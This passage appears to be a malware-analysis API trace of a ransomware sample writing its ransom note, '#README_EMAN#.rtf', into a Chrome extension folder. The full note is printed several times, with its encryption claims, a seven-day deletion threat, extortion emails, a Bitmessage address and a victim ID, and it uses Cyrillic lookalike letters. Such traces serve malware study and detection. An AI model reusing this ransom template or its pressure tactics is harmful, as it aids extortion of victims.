g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0281.649] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x245c778, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nù^=«\x16O\x1fïж>\x9bXË\x7fEóO¸Ù\x0c0\x9a\x03\x1f", lpUsedDefaultChar=0x0) returned 8717 [0281.649] WriteFile (in: hFile=0x2c8, lpBuffer=0x245c778*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x245c778*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0281.650] CloseHandle (hObject=0x2c8) returned 1 [0281.650] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\#readme_eman#.rtf")) returned 0xffffffff [0281.650] GetLastError () returned 0x2 [0281.650] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0281.653] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 